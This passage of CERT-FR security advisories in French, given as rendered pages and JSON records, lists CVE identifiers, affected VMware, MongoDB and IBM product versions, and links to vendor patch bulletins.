"name": "CVE-2026-32282",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32282"
},
{
"name": "CVE-2026-34514",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34514"
},
{
"name": "CVE-2018-11307",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11307"
},
{
"name": "CVE-2024-3651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
},
{
"name": "CVE-2025-68121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68121"
},
{
"name": "CVE-2025-53045",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53045"
},
{
"name": "CVE-2019-10086",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-10086"
},
{
"name": "CVE-2020-10968",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10968"
},
{
"name": "CVE-2025-30693",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30693"
},
{
"name": "CVE-2025-2099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2099"
},
{
"name": "CVE-2025-1194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1194"
},
{
"name": "CVE-2025-6638",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6638"
},
{
"name": "CVE-2025-21585",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21585"
},
{
"name": "CVE-2025-14819",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14819"
},
{
"name": "CVE-2022-42003",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42003"
},
{
"name": "CVE-2026-4786",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4786"
},
{
"name": "CVE-2020-25649",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25649"
},
{
"name": "CVE-2026-27141",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27141"
},
{
"name": "CVE-2023-2976",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2976"
},
{
"name": "CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"name": "CVE-2016-1000344",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000344"
},
{
"name": "CVE-2017-17485",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-17485"
},
{
"name": "CVE-2025-1094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-1094"
},
{
"name": "CVE-2025-53864",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53864"
},
{
"name": "CVE-2017-3164",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-3164"
},
{
"name": "CVE-2026-41066",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41066"
},
{
"name": "CVE-2026-34520",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34520"
},
{
"name": "CVE-2025-53053",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-53053"
},
{
"name": "CVE-2025-59419",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59419"
},
{
"name": "CVE-2022-1471",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-1471"
},
{
"name": "CVE-2019-14379",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14379"
},
{
"name": "CVE-2026-24880",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24880"
},
{
"name": "CVE-2021-35515",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-35515"
},
{
"name": "CVE-2026-33816",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33816"
},
{
"name": "CVE-2026-2004",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2004"
},
{
"name": "CVE-2026-0672",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0672"
},
{
"name": "CVE-2017-7669",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7669"
},
{
"name": "CVE-2023-32681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32681"
},
{
"name": "CVE-2025-21581",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21581"
},
{
"name": "CVE-2017-8806",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-8806"
},
{
"name": "CVE-2025-41242",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-41242"
},
{
"name": "CVE-2019-0193",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-0193"
},
{
"name": "CVE-2022-3171",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3171"
},
{
"name": "CVE-2026-33231",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33231"
},
{
"name": "CVE-2022-30126",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30126"
},
{
"name": "CVE-2025-46392",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-46392"
},
{
"name": "CVE-2020-11112",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11112"
},
{
"name": "CVE-2025-30685",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30685"
},
{
"name": "CVE-2018-1000180",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000180"
},
{
"name": "CVE-2025-6921",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6921"
},
{
"name": "CVE-2025-30695",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30695"
},
{
"name": "CVE-2025-30688",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30688"
},
{
"name": "CVE-2023-5752",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5752"
},
{
"name": "CVE-2026-34276",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34276"
},
{
"name": "CVE-2022-24614",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24614"
},
{
"name": "CVE-2026-22815",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22815"
},
{
"name": "CVE-2020-13959",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13959"
},
{
"name": "CVE-2025-24814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24814"
},
{
"name": "CVE-2020-11111",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11111"
},
{
"name": "CVE-2020-11979",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-11979"
},
{
"name": "CVE-2025-67221",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-67221"
},
{
"name": "CVE-2024-21243",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21243"
},
{
"name": "CVE-2026-33230",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33230"
},
{
"name": "CVE-2021-31811",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-31811"
},
{
"name": "CVE-2021-27807",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-27807"
},
{
"name": "CVE-2026-1225",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1225"
},
{
"name": "CVE-2026-24281",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24281"
},
{
"name": "CVE-2026-1462",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1462"
},
{
"name": "CVE-2025-50083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50083"
},
{
"name": "CVE-2022-25168",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25168"
},
{
"name": "CVE-2026-34293",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34293"
},
{
"name": "CVE-2020-14060",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14060"
},
{
"name": "CVE-2020-36188",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-36188"
},
{
"name": "CVE-2016-1000027",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-1000027"
},
{
"name": "CVE-2025-61729",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61729"
},
{
"name": "CVE-2018-11802",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11802"
},
{
"name": "CVE-2025-3777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-3777"
},
{
"name": "CVE-2025-14831",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-14831"
},
{
"name": "CVE-2018-11796",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11796"
},
{
"name": "CVE-2020-13957",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-13957"
},
{
"name": "CVE-2019-14892",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14892"
},
{
"name": "CVE-2025-66418",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66418"
},
{
"name": "CVE-2018-1000632",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-1000632"
},
{
"name": "CVE-2026-0846",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0846"
},
{
"name": "CVE-2025-48734",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-48734"
},
{
"name": "CVE-2025-11226",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11226"
},
{
"name": "CVE-2020-14062",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-14062"
}
],
"initial_release_date": "2026-05-11T00:00:00",
"last_revision_date": "2026-05-11T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0556",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-05-11T00:00:00.000000"
}
],
"risks": [
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits VMware. Elles permettent \u00e0 un attaquant de provoquer un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits VMware",
"vendor_advisories": [
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37451",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37451"
},
{
"published_at": "2026-05-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37445",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37445"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37460",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37460"
},
{
"published_at": "2026-05-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37449",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37449"
},
{
"published_at": "2026-05-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37450",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37450"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37466",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37466"
},
{
"published_at": "2026-05-08",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37468",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37468"
},
{
"published_at": "2026-05-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37444",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37444"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37461",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37461"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware DSA-2016-11",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37459"
},
{
"published_at": "2026-05-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37446",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37446"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37465",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37465"
},
{
"published_at": "2026-05-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37448",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37448"
},
{
"published_at": "2026-05-06",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37447",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37447"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37463",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37463"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37452",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37452"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37462",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37462"
},
{
"published_at": "2026-05-07",
"title": "Bulletin de s\u00e9curit\u00e9 VMware 37464",
"url": "https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37464"
}
]
}
CERTFR-2026-AVI-0581
Vulnerability from certfr_avis - Published: 2026-05-13 - Updated: 2026-05-13
De multiples vulnérabilités ont été découvertes dans MongoDB. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance et un problème de sécurité non spécifié par l'éditeur.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| MongoDB | N/A | MongoDB versions 8.3.x antérieures à 8.3.2 | ||
| MongoDB | N/A | MongoDB versions 7.0.x antérieures à 7.0.35 | ||
| MongoDB | N/A | MongoDB versions 8.0.x antérieures à 8.0.24 | ||
| MongoDB | N/A | MongoDB versions 6.0.x antérieures à 6.0.28 | ||
| MongoDB | N/A | MongoDB versions 8.2.x antérieures à 8.2.10 | ||
| MongoDB | N/A | MongoDB versions 5.0.x antérieures à 5.0.33 |
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "MongoDB versions 8.3.x ant\u00e9rieures \u00e0 8.3.2",
"product": {
"name": "N/A",
"vendor": {
"name": "MongoDB",
"scada": false
}
}
},
{
"description": "MongoDB versions 7.0.x ant\u00e9rieures \u00e0 7.0.35",
"product": {
"name": "N/A",
"vendor": {
"name": "MongoDB",
"scada": false
}
}
},
{
"description": "MongoDB versions 8.0.x ant\u00e9rieures \u00e0 8.0.24",
"product": {
"name": "N/A",
"vendor": {
"name": "MongoDB",
"scada": false
}
}
},
{
"description": "MongoDB versions 6.0.x ant\u00e9rieures \u00e0 6.0.28",
"product": {
"name": "N/A",
"vendor": {
"name": "MongoDB",
"scada": false
}
}
},
{
"description": "MongoDB versions 8.2.x ant\u00e9rieures \u00e0 8.2.10",
"product": {
"name": "N/A",
"vendor": {
"name": "MongoDB",
"scada": false
}
}
},
{
"description": "MongoDB versions 5.0.x ant\u00e9rieures \u00e0 5.0.33",
"product": {
"name": "N/A",
"vendor": {
"name": "MongoDB",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-33871",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33871"
},
{
"name": "CVE-2026-33895",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33895"
},
{
"name": "CVE-2026-33186",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33186"
},
{
"name": "CVE-2026-33940",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33940"
},
{
"name": "CVE-2026-33870",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33870"
},
{
"name": "CVE-2026-33941",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33941"
},
{
"name": "CVE-2026-33894",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33894"
},
{
"name": "CVE-2026-33939",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33939"
},
{
"name": "CVE-2026-4867",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4867"
},
{
"name": "CVE-2026-33891",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33891"
},
{
"name": "CVE-2026-8053",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-8053"
},
{
"name": "CVE-2025-50537",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-50537"
},
{
"name": "CVE-2026-33916",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33916"
},
{
"name": "CVE-2026-2332",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2332"
},
{
"name": "CVE-2026-33937",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33937"
},
{
"name": "CVE-2026-33938",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33938"
},
{
"name": "CVE-2026-33896",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33896"
}
],
"initial_release_date": "2026-05-13T00:00:00",
"last_revision_date": "2026-05-13T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0581",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-05-13T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans MongoDB. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance et un probl\u00e8me de s\u00e9curit\u00e9 non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans MongoDB",
"vendor_advisories": [
{
"published_at": "2026-05-13",
"title": "Bulletin de s\u00e9curit\u00e9 MongoDB SERVER-122032",
"url": "https://jira.mongodb.org/browse/SERVER-122032"
},
{
"published_at": "2026-05-12",
"title": "Bulletin de s\u00e9curit\u00e9 MongoDB #onprem-server-8.0.23",
"url": "https://www.mongodb.com/docs/ops-manager/current/release-notes/application/#onprem-server-8.0.23"
},
{
"published_at": "2026-05-13",
"title": "Bulletin de s\u00e9curit\u00e9 MongoDB SERVER-120668",
"url": "https://jira.mongodb.org/browse/SERVER-120668"
},
{
"published_at": "2026-05-13",
"title": "Bulletin de s\u00e9curit\u00e9 MongoDB SERVER-122449",
"url": "https://jira.mongodb.org/browse/SERVER-122449"
},
{
"published_at": "2026-05-12",
"title": "Bulletin de s\u00e9curit\u00e9 MongoDB SERVER-126021",
"url": "https://jira.mongodb.org/browse/SERVER-126021"
}
]
}
CERTFR-2026-AVI-0698
Vulnerability from certfr_avis - Published: 2026-06-05 - Updated: 2026-06-05
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | WebSphere | WebSphere Remote Server versions 9.1, 9.0 et 8.5 sans le dernier correctif de sécurité | ||
| IBM | WebSphere | WebSphere Service Registry and Repository Studio versions 8.5.x antérieures à 8.5.6.3_IJ58210 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.3.0.x antérieures à 6.3.0.19 | ||
| IBM | QRadar Log Source Management App | QRadar Log Source Management App versions antérieures à 7.0.15 | ||
| IBM | WebSphere | WebSphere Application Server versions 8.5.0.0 à 8.5.5.29 sans le correctif de sécurité temporaire PH71453 ou antérieures à 8.5.5.30 (disponibilité prévue pour le troisième trimestre 2026) | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct for Microsoft Windows versions 6.3.0.x antérieures à 6.3.0.6_iFix051 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.4.0.x antérieures à 6.4.0.8 | ||
| IBM | WebSphere | WebSphere Application Server versions 9.0.0.0 à 9.0.5.28 sans le correctif de sécurité temporaire PH71453 ou antérieures à 9.0.5.29 (disponibilité prévue pour le troisième trimestre 2026) | ||
| IBM | QRadar Assistant | QRadar AI Assistant versions antérieures à 2.0.0 | ||
| IBM | WebSphere Service Registry and Repository | WebSphere Service Registry and Repository versions 8.5 sans le dernier correctif de sécurité | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct for Microsoft Windows versions 6.4.0.x antérieures à 6.4.0.4_iFix022 | ||
| IBM | Security QRadar EDR | Security QRadar EDR versions 3.12.x antérieures 3.12.25 |
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "WebSphere Remote Server versions 9.1, 9.0 et 8.5 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Service Registry and Repository Studio versions 8.5.x ant\u00e9rieures \u00e0 8.5.6.3_IJ58210",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.3.0.x ant\u00e9rieures \u00e0 6.3.0.19",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar Log Source Management App versions ant\u00e9rieures \u00e0 7.0.15",
"product": {
"name": "QRadar Log Source Management App",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 8.5.0.0 \u00e0 8.5.5.29 sans le correctif de s\u00e9curit\u00e9 temporaire PH71453 ou ant\u00e9rieures \u00e0 8.5.5.30 (disponibilit\u00e9 pr\u00e9vue pour le troisi\u00e8me trimestre 2026)",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct for Microsoft Windows versions 6.3.0.x ant\u00e9rieures \u00e0 6.3.0.6_iFix051",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.4.0.x ant\u00e9rieures \u00e0 6.4.0.8",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Application Server versions 9.0.0.0 \u00e0 9.0.5.28 sans le correctif de s\u00e9curit\u00e9 temporaire PH71453 ou ant\u00e9rieures \u00e0 9.0.5.29 (disponibilit\u00e9 pr\u00e9vue pour le troisi\u00e8me trimestre 2026)",
"product": {
"name": "WebSphere",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar AI Assistant versions ant\u00e9rieures \u00e0 2.0.0",
"product": {
"name": "QRadar Assistant",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "WebSphere Service Registry and Repository versions 8.5 sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "WebSphere Service Registry and Repository",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct for Microsoft Windows versions 6.4.0.x ant\u00e9rieures \u00e0 6.4.0.4_iFix022",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Security QRadar EDR versions 3.12.x ant\u00e9rieures 3.12.25",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"name": "CVE-2026-2229",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2229"
},
{
"name": "CVE-2026-33871",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33871"
},
{
"name": "CVE-2025-12816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12816"
},
{
"name": "CVE-2026-42041",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42041"
},
{
"name": "CVE-2026-22036",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22036"
},
{
"name": "CVE-2026-33895",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33895"
},
{
"name": "CVE-2026-39892",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-39892"
},
{
"name": "CVE-2026-32286",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32286"
},
{
"name": "CVE-2026-44432",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44432"
},
{
"name": "CVE-2026-25793",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25793"
},
{
"name": "CVE-2026-1527",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1527"
},
{
"name": "CVE-2025-66035",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66035"
},
{
"name": "CVE-2026-41239",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41239"
},
{
"name": "CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"name": "CVE-2026-22013",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22013"
},
{
"name": "CVE-2026-1525",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1525"
},
{
"name": "CVE-2026-22018",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22018"
},
{
"name": "CVE-2026-41314",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41314"
},
{
"name": "CVE-2026-33870",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33870"
},
{
"name": "CVE-2026-42036",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42036"
},
{
"name": "CVE-2026-41313",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41313"
},
{
"name": "CVE-2026-2581",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2581"
},
{
"name": "CVE-2021-23337",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-23337"
},
{
"name": "CVE-2022-35961",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-35961"
},
{
"name": "CVE-2026-9319",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-9319"
},
{
"name": "CVE-2025-66031",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66031"
},
{
"name": "CVE-2025-62718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-62718"
},
{
"name": "CVE-2026-25645",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25645"
},
{
"name": "CVE-2026-4800",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4800"
},
{
"name": "CVE-2026-0540",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-0540"
},
{
"name": "CVE-2026-33671",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33671"
},
{
"name": "CVE-2026-33894",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33894"
},
{
"name": "CVE-2026-33532",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33532"
},
{
"name": "CVE-2026-42033",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42033"
},
{
"name": "CVE-2026-42035",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42035"
},
{
"name": "CVE-2026-33750",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33750"
},
{
"name": "CVE-2026-34478",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34478"
},
{
"name": "CVE-2026-2359",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2359"
},
{
"name": "CVE-2026-42043",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42043"
},
{
"name": "CVE-2025-11143",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11143"
},
{
"name": "CVE-2026-34480",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34480"
},
{
"name": "CVE-2026-40175",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40175"
},
{
"name": "CVE-2025-68161",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68161"
},
{
"name": "CVE-2026-41240",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41240"
},
{
"name": "CVE-2026-34479",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34479"
},
{
"name": "CVE-2026-8644",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-8644"
},
{
"name": "CVE-2026-42040",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42040"
},
{
"name": "CVE-2026-4923",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-4923"
},
{
"name": "CVE-2026-41312",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-41312"
},
{
"name": "CVE-2026-33891",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33891"
},
{
"name": "CVE-2025-66030",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66030"
},
{
"name": "CVE-2026-2950",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2950"
},
{
